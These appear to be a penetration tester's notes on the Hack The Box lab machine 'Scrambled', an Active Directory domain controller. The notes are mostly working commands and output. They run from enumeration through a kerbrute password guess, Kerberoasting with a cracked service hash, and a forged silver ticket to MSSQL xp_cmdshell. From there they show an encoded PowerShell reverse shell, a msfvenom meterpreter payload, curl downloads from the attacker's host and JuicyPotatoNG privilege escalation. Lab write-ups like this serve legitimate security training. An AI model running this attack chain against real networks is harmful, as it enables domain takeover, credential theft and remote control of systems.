🙆‍♂️

Scrambled

53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49675,49676,49688,49755,64811
notion image
echo "10.129.75.146 scrm.local dc1.scrm.local" >> /etc/hosts
smb failed
GETNPUSERS enumeration failed
ldapscan:
nmap -n -sV --script "ldap* and not brute" 10.129.75.146 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=scrm,DC=local | serverName: CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=scrm,DC=local | schemaNamingContext: CN=Schema,CN=Configuration,DC=scrm,DC=local | namingContexts: DC=scrm,DC=local | namingContexts: CN=Configuration,DC=scrm,DC=local | namingContexts: CN=Schema,CN=Configuration,DC=scrm,DC=local | namingContexts: DC=DomainDnsZones,DC=scrm,DC=local | namingContexts: DC=ForestDnsZones,DC=scrm,DC=local | isSynchronized: TRUE | highestCommittedUSN: 290979 | dsServiceName: CN=NTDS Settings,CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=scrm,DC=local | dnsHostName: DC1.scrm.local | defaultNamingContext: DC=scrm,DC=local | currentTime: 20240214162425.0Z |_ configurationNamingContext: CN=Configuration,DC=scrm,DC=local Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
notion image
ldapsearch failed
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.75.146
failed
search on port 4411:found
notion image
notion image
SCRAMBLECORP_ORDERS_V1.0.3
search on google but nothing special found
 
on port 80, found a username: ksimpson
notion image
 
try kerbrute for this single user:
/root/Desktop/Tool/kerbrute_linux_amd64 bruteuser ./pass ksimpson -d scrm.local --dc dc.scrm.local -v
2024/02/15 13:13:33 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
get a credential ksimpson:ksimpson
notion image
NTLM disabled.
try to get a silver ticket
getTGT.py scrm.local/ksimpson:ksimpson
notion image
export KRB5CCNAME=~/Desktop/scrambled/ksimpson.ccache
psexec.py scrm.local/ksimpson@10.129.75.146 -k -no-pass
notion image
preauth invalid
python3 smbexec.py -k -no-pass dc1.scrm.local -target-ip 10.129.75.146
┌──(root㉿kali)-[~/Desktop/scrambled] └─# ntpdate scrm.local 2024-02-15 14:14:38.10018 (+0800) -24.299402 +/- 0.210894 scrm.local 10.129.75.146 s1 no-leap CLOCK: time stepped by -24.299402
smbclient.py -k scrm.local/ksimpson@dc1.scrm.local -no-pass
connect successfully!
notion image
notion image
found a pdf file
notion image
get it
open it
notion image
get registered SPNs
GetUserSPNs.py -request -dc-ip dc1.scrm.local scrm.local/ksimpson -dc-host dc1.scrm.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------------- ------ -------- -------------------------- -------------------------- ---------- MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-04 00:32:02.351452 2024-02-14 23:27:06.326299 MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-04 00:32:02.351452 2024-02-14 23:27:06.326299 $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$32ba5bdae17d20dc632c98fddb1cf28e$32373766f897b9422866e8063f9ebe55222134c4ac3fa78cc94b27b19bbeee963478658a4c764290ce121447cdfe0d758dccb9e766b10782af53bf7e3f87b89dae740d62050d649162e850797f5703da0524f79d952550ca67bd1cfabecbd3c65927f7c841f7ddfdeb1d1f5087c96068b0a9e39abc7a5941b62fdd531443d1012fb323de1f70b5cfc715a09bd38100240030acd245aa2f30fd778f4f73391983c84bb46ebeacc0f5450afebcfaf4c486426ecdfc55d460a61469152d46e2e354d34fd4f5d1d8cc5136c1b28f8cd6be14d39fc30ac6c50d5487a547cce5b8e0554ec43372004901aa37c2e046f37861ce9caab787f89bce2f94f3e8a1fc54f9f85b9c6a1e3dd579bd72d1a6ebf11de9cdc230451a4ec966ad05ee2b1fd89d5fc549bae30d6b5ac5b970650e81b321d9b4d5e12e5754856c2987e2e05c13f1244297443f82a861e24a60d4d621355f5153dcacffe073fe4fa4b70a601fde86615ae90fd18d57ed1f93d825e8a6dd11a03b3a4fb4a42a3c42ffc07dcaab7cab979502a0bd9446013c4b447ff939bb211632a30e302a577e2714824246d93a5581b8938e043a4eac8550bd1b9e901ae8da37eac9a4f29b59eac0bacf13ea8571a29ddfc06233031234f1736a090905432b66f5b9deeb90415fa7b9b9a81b5da1e68c9e72bd6426450524817f6763dc24d0882467a22aac04003d576851cd0b373a11b8170ac24ef3d61ee5aac51bbee90b176a5382a821457f408d66c2e0a43dbba4217e29e4ff7d1c778e5c0e0de9d231cd608a51d8f4c5a42e2045703b111278846c1ca1193c5bd3901335d44eac2817fc9407327e7c8844c7f1e62d43999d3451a61fe281629a94f57cba65081e39985ba8182783e8689faf6d7957c0bb53f47eb91f8589ec5c40a86aaa62fcf90e2c644f2158195d5371810d3e88f1e7813f76545d4fafec48a7f63043b05336b1728ff2d3a250c4c537ee289e3d5b825aa047e0d3bb2a38d5d2e8c8e8b3ee710be4693eb22bf3ebfeb2bc4e589b38984eee396624e1c72384f5589d7eecbcc2059c0ec1533ba6dc86da9a72866383370edb5fe6e13336aa9ce7d588402670ab35eba63fe64f2afc0c23f038192619bc3c1950d71003aa0aed482d4710e616be81a6ae596781be1e6871b9e2da6f7b73c9c156a2ef707a3efd99464f2539a240e848efc8046fb037a115e2e51c9bd48fe0141ee0f537390eb7003dbeeaf67cd4b87b65caeadedb980e3abb3e61408508cd540d410846e2fa68382a395c579c967005dfb1160cdb37d6199a2e274ec20a3b77257c0622aa19870653e08f140c6e8c0ab9d82a061ba8b92ea17ac45a5316d1307efbc97d60ee4fc620f2dd3dbebb79fadd9a65fef2dc41c82b4758143a9758ced81f2152b47bd06e1f71d77cb6deb34452d8c2e7abefb37a70e4bf8a
i retrieved sqlsvc and a hash
try to brute force the hash by hashcat
┌──(root㉿kali)-[~/Desktop/scrambled] └─# hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --show $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$32ba5bdae17d20dc632c98fddb1cf28e$32373766f897b9422866e8063f9ebe55222134c4ac3fa78cc94b27b19bbeee963478658a4c764290ce121447cdfe0d758dccb9e766b10782af53bf7e3f87b89dae740d62050d649162e850797f5703da0524f79d952550ca67bd1cfabecbd3c65927f7c841f7ddfdeb1d1f5087c96068b0a9e39abc7a5941b62fdd531443d1012fb323de1f70b5cfc715a09bd38100240030acd245aa2f30fd778f4f73391983c84bb46ebeacc0f5450afebcfaf4c486426ecdfc55d460a61469152d46e2e354d34fd4f5d1d8cc5136c1b28f8cd6be14d39fc30ac6c50d5487a547cce5b8e0554ec43372004901aa37c2e046f37861ce9caab787f89bce2f94f3e8a1fc54f9f85b9c6a1e3dd579bd72d1a6ebf11de9cdc230451a4ec966ad05ee2b1fd89d5fc549bae30d6b5ac5b970650e81b321d9b4d5e12e5754856c2987e2e05c13f1244297443f82a861e24a60d4d621355f5153dcacffe073fe4fa4b70a601fde86615ae90fd18d57ed1f93d825e8a6dd11a03b3a4fb4a42a3c42ffc07dcaab7cab979502a0bd9446013c4b447ff939bb211632a30e302a577e2714824246d93a5581b8938e043a4eac8550bd1b9e901ae8da37eac9a4f29b59eac0bacf13ea8571a29ddfc06233031234f1736a090905432b66f5b9deeb90415fa7b9b9a81b5da1e68c9e72bd6426450524817f6763dc24d0882467a22aac04003d576851cd0b373a11b8170ac24ef3d61ee5aac51bbee90b176a5382a821457f408d66c2e0a43dbba4217e29e4ff7d1c778e5c0e0de9d231cd608a51d8f4c5a42e2045703b111278846c1ca1193c5bd3901335d44eac2817fc9407327e7c8844c7f1e62d43999d3451a61fe281629a94f57cba65081e39985ba8182783e8689faf6d7957c0bb53f47eb91f8589ec5c40a86aaa62fcf90e2c644f2158195d5371810d3e88f1e7813f76545d4fafec48a7f63043b05336b1728ff2d3a250c4c537ee289e3d5b825aa047e0d3bb2a38d5d2e8c8e8b3ee710be4693eb22bf3ebfeb2bc4e589b38984eee396624e1c72384f5589d7eecbcc2059c0ec1533ba6dc86da9a72866383370edb5fe6e13336aa9ce7d588402670ab35eba63fe64f2afc0c23f038192619bc3c1950d71003aa0aed482d4710e616be81a6ae596781be1e6871b9e2da6f7b73c9c156a2ef707a3efd99464f2539a240e848efc8046fb037a115e2e51c9bd48fe0141ee0f537390eb7003dbeeaf67cd4b87b65caeadedb980e3abb3e61408508cd540d410846e2fa68382a395c579c967005dfb1160cdb37d6199a2e274ec20a3b77257c0622aa19870653e08f140c6e8c0ab9d82a061ba8b92ea17ac45a5316d1307efbc97d60ee4fc620f2dd3dbebb79fadd9a65fef2dc41c82b4758143a9758ced81f2152b47bd06e1f71d77cb6deb34452d8c2e7abefb37a70e4bf8a:Pegasus60
sqlsvc:Pegasus60
generate a NTLM hash
B999A16500B87D17EC7F2E2A68778F05
find the SID
──(root㉿kali)-[~/Desktop/scrambled] └─# getPac.py -targetUser svcsql -hashes aad3b435b51404eeaad3b435b51404ee:B999A16500B87D17EC7F2E2A68778F05 scrm.local/ksimpson:ksimpson@10.129.75.146 Impacket v0.11.0 - Copyright 2023 Fortra [-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
secretsdump.py -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug
notion image
S-1-5-21-2743207045-1827831105-2542523200
create a new ticket
ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -user-id 500 -domain scrm.local -spn MSSQLSVC/scrm.local Administrator
ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator
export KRB5CCNAME=~/Desktop/scrambled/Administrator.ccache
mssqlclient.py -k -no-pass dc1.scrm.local
notion image
notion image
SELECT * FROM SYSOBJECTS WHERE xtype= 'U';
notion image
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM UserImport LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups -------- ----------------- ---------- --------------- ------------- MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell [*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami output ----------- scrm\sqlsvc NULL
start a reverse shell
xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA3ACIALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
notion image
SeImpersonatePrivilege is enabled
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.17 LPORT=3333 -f exe -o reverse.exe
make a .bat file rev.bat
c:\\programdata\\r1.exe
 
curl 10.10.16.17:8000/reverse.exe -outfile C:\\programdata\\r1.exe curl 10.10.16.17:8000/rev.bat -outfile C:\\programdata\\rev.bat curl 10.10.16.17:8000/JuicyPotatoNG.exe -outfile C:\\programdata\\jp.exe
 
C:\\programdata\\jp.exe -t * -p C:\\programdata\\rev.bat
notion image
notion image